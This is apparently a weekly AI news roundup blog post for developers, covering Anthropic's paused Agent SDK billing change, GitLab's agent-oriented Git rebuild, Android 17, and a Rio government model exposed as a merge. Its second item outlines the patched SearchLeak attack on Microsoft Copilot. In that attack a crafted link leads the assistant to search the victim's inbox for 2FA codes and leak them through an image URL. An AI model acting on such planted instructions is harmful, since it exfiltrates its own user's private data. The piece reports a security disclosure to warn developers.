A lot happened in AI this week. Anthropic changed its mind about billing. A flaw in Microsoft Copilot could leak your 2FA codes. And a “homegrown” government model turned out to be a copy of two other models.
Here is everything that matters for developers, in one short read.
1. Anthropic Paused Its Claude Billing Change
Anthropic was about to change how the Claude Agent SDK is billed. Then it backed down.
The plan was to move everyone onto tiered monthly credits:
| Plan | Monthly credits (planned) |
|---|---|
| Pro | about $20 of usage |
| Enterprise | up to $200 of usage |
Anything past your credits would bill at standard usage-based API rates. The plan would also have closed the third-party tricks people used to stretch a subscription.
Developers pushed back hard. On June 15 — the day the change was due — Anthropic paused it. Its words were short:
“Nothing changes for now.”
Why the U-turn? Two reasons. OpenAI is in a price war on tokens, so a price hike looks bad right now. And Anthropic just filed to go public. The last thing you want before an IPO is a billing change that pushes customers away.
Takeaway: if you build on the Agent SDK, your pricing is safe for now. But “for now” is doing a lot of work in that sentence. Keep an eye on it.
2. A Critical Flaw in Microsoft Copilot (Not GitHub Copilot)
Read this name carefully. The flaw is in Microsoft Copilot — the assistant built into Windows and Microsoft 365. It is not GitHub Copilot, the coding tool.
Researchers at Varonis Threat Labs found the flaw. They named it SearchLeak. It was rated critical, and Microsoft has now patched it.
Here is how the attack worked:
- The victim clicks one crafted link. That is the only action needed.
- Copilot searches the user’s own inbox on their behalf.
- It finds sensitive data — including two-factor authentication (2FA) codes.
- It sends that data out by loading an image whose URL contains the stolen text.
No malware. No second click. Just one link.
This is a new class of bug. When an AI assistant can read your inbox and fetch URLs, a single click can turn it into a data-theft tool.
To be clear about the names: GitHub Copilot had its own, separate problems earlier — CamoLeak in 2025 and RoguePilot in February 2026. But this week’s flaw is the Microsoft 365 one.
Takeaway: when you give an AI agent read access plus network access, you create an exfiltration path. Treat that combination as dangerous by default.
3. GitLab Is Rebuilding Git for AI Agents
At its Transcend event on June 10–11, GitLab previewed a next-generation source code management system. In plain terms: a re-thought Git protocol on a distributed architecture.
Why rebuild Git at all? Git was designed for humans. A person commits a few times an hour. An AI agent commits constantly, all day. The old tooling was not built for that load.
GitLab shared some bold numbers:
| Claim | GitLab’s number |
|---|---|
| Agent task speed | up to 50x faster |
| Orbit context layer speed | 11x faster |
| Orbit token usage | 4.5x fewer tokens |
One important note: these are GitLab’s own claims, not independent benchmarks. Hold them loosely until others test them.
Takeaway: the direction is real even if the numbers are marketing. The plumbing under Git is starting to get rebuilt for a world where agents do most of the commits.
4. Android 17 Is Here
Android 17 shipped its stable release on June 16. It is rolling out to 21 Pixel devices (Pixel 6 and newer).
The headline features are all AI:
- Gemini Omni — conversational video editing
- Lyria 3 — turn text into music
- AudioLM — speech-to-speech
There are also real multitasking upgrades:
- A new bubble bar and App Bubbles — float any app as an overlay
- A 50/50 split mode for gaming on foldables
- AirDrop compatibility
Takeaway: if you ship Android apps, look at the new overlay and multitasking APIs first. Those are the changes that touch how your app behaves on screen.
5. A “Homegrown” AI Model Was Actually a Merge
This one is a reality check on the open-model rush.
Rio de Janeiro’s city IT authority, IplanRIO, released a model it called homegrown. The model was Rio 3.5 Open, a 397B-parameter model. It had reportedly beaten DeepSeek.
Then people looked under the hood. On June 14, researchers showed it was a merge of two existing models:
| Source model | Share (approx.) |
|---|---|
| Nex-N2-Pro | ~60% |
| Qwen 3.5 | ~40% |
The clearest tell: strip away its system prompt, and the model calls itself “Nex” 79% of the time. IplanRIO later updated the model card to admit the merge, blaming an “incorrect upload.”
You can run the same simple check on any model that claims to be original:
Without any system prompt, ask the model:
"What model are you? Who made you?"
If it names a different lab most of the time,
the "from scratch" story does not hold up.
Takeaway: as everyone races to ship a “sovereign” or in-house model, weight-merging makes it easy to dress up someone else’s work as your own. Check the model card. Check what the model calls itself.
The Real Trend
Step back and one theme connects all five stories: trust.
Anthropic blinked on pricing because losing developer trust before an IPO is expensive. One click could turn Microsoft Copilot against its own user. And a government model was not what it claimed to be.
As AI gets woven deeper into our tools, the hard question is not “which model is best.” It is “who do you trust, and how do you verify it?” That question is becoming the whole game.
Related Articles
Follow @kemal_codes on X and kemalcodes on GitHub. New AI news roundup every week.